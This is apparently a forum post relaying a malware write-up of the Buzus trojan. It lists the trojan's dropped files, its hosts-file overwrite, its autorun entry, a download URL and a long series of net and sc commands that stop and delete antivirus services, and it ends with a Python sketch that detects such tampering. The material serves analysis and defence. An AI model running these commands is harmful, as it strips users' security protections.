A Trojan that shuts down anti-virus.

Can avast detect this worm yet?

TR/Buzus.dhxv - Trojan

Files

It copies itself to the following locations:
• %drive%\conime.exe
• %SYSDIR%\wcoredt.exe

It overwrites a file.
– %SYSDIR%\drivers\etc\hosts

It deletes the initially executed copy of itself.

The following file is created:

– %drive%\autorun.inf This is a non-malicious text file with the following content:
• %code that runs malware%

It tries to download a file:

– The location is the following:
http://up.g-youtube.info/net/**********

It tries to execute the following files:

• ipconfig /flushdns
• sc delete K7TSMngr
• net stop "avast! Antivirus"
• sc stop "avast! Antivirus"
• sc config "avast! Antivirus" start= disabled
• net1 stop "avast! Antivirus"
• sc delete "avast! Antivirus"
• net stop AntiVirService
• sc stop AntiVirService
• sc config AntiVirService start= disabled
• net1 stop AntiVirService
• net stop K7RTScan
• sc delete AntiVirService
• net stop PASRV
• sc stop PASRV
• net1 stop PASRV
• sc config PASRV start= disabled
• sc delete PASRV
• net stop VSSERV
• sc stop VSSERV
• sc config VSSERV start= disabled
• net1 stop VSSERV
• sc stop K7RTScan
• sc delete VSSERV
• net stop avg8wd
• sc stop avg8wd
• sc config avg8wd start= disabled
• net1 stop avg8wd
• sc delete avg8wd
• net stop avg9wd
• sc stop avg9wd
• net1 stop avg9wd
• sc config avg9wd start= disabled
• sc config K7RTScan start= disabled
• sc delete avg9wd
• net stop NOD32krn
• sc stop NOD32krn
• net1 stop NOD32krn
• sc config NOD32krn start= disabled
• sc delete NOD32krn
• net stop ekrn
• sc stop ekrn
• net1 stop ekrn
• sc config ekrn start= disabled
• net1 stop K7RTScan
• sc delete ekrn
• net stop McShield
• sc stop McShield
• net1 stop McShield
• sc config McShield start= disabled
• sc delete McShield
• net stop OutpostFirewall
• sc stop OutpostFirewall
• sc config OutpostFirewall start= disabled
• sc delete K7RTScan
• net stop K7TSMngr
• sc stop K7TSMngr
• sc config K7TSMngr start= disabled
• net1 stop K7TSMngr

More info: http://www.avira.com/en/threats/section/fulldetails/id_vir/5193/tr_buzus.dhxv.html

2010.02.16 - VirusTotal - 5/40
http://www.virustotal.com/analisis/ad48136e328398c36d53699e215946d15afcd22cb9e2eb816a6169e355645120-1266312211

If you have a sample, scan it again and post the result…
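
A defender-side sketch of how the behaviour in the command list above could be flagged from process-creation logs, added here as an example and not part of the original posts or of Avira's write-up: it counts how many of the listed security services a single parent process stops, disables or deletes within a short window. The event tuples, host names, the parent name `unknown.exe`, the 60-second window and the threshold of three services are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Service names taken from the command list in the post above.
AV_SERVICES = {s.lower() for s in (
    "avast! Antivirus", "AntiVirService", "PASRV", "VSSERV", "avg8wd", "avg9wd",
    "NOD32krn", "ekrn", "McShield", "OutpostFirewall", "K7RTScan", "K7TSMngr")}

def classify(cmdline):
    """Return (action, service) if cmdline tampers with a listed service, else None."""
    # Forum and ticket software often turns straight quotes into curly ones.
    cmdline = cmdline.translate({0x201C: '"', 0x201D: '"'})
    argv = [q or w for q, w in re.findall(r'"([^"]*)"|(\S+)', cmdline)]
    if len(argv) < 3:
        return None
    # Reduce "C:\WINDOWS\system32\net1.exe" to "net1".
    tool = re.sub(r"\.exe$", "", argv[0].rsplit("\\", 1)[-1].lower())
    verb, svc = argv[1].lower(), argv[2].lower()
    if svc not in AV_SERVICES:
        return None
    if tool in ("net", "net1") and verb == "stop":
        return ("stop", svc)
    if tool == "sc" and verb in ("stop", "delete"):
        return (verb, svc)
    # sc.exe accepts "start= disabled" as two tokens; join before comparing.
    if tool == "sc" and verb == "config" and "".join(argv[3:]).lower() == "start=disabled":
        return ("disable", svc)
    return None

def detect(events, window=60, min_services=3):
    """events: (epoch_seconds, host, parent_image, cmdline) tuples.
    Alert when one parent on one host hits >= min_services distinct listed
    services within `window` seconds; a single maintenance stop stays quiet."""
    hits = defaultdict(list)
    for ts, host, parent, cmd in sorted(events):
        found = classify(cmd)
        if found:
            hits[(host, parent.lower())].append((ts, found[1]))
    alerts = {}
    for key, seq in hits.items():
        for i, (t0, _) in enumerate(seq):
            services = {s for t, s in seq[i:] if t - t0 <= window}
            if len(services) >= min_services:
                alerts[key] = sorted(services)
                break
    return alerts

# Constructed sample events (not real telemetry).
SAMPLE = [
    (0, "pc1", "unknown.exe", 'net stop "avast! Antivirus"'),
    (1, "pc1", "unknown.exe", "sc config AntiVirService start= disabled"),
    (2, "pc1", "unknown.exe", r"C:\WINDOWS\system32\net1.exe stop ekrn"),
    (3, "pc1", "unknown.exe", "sc delete McShield"),
    (5, "pc1", "unknown.exe", "ipconfig /flushdns"),
    (10, "pc2", "cmd.exe", "net stop McShield"),
    (4000, "pc2", "cmd.exe", "sc query ekrn"),
]
```
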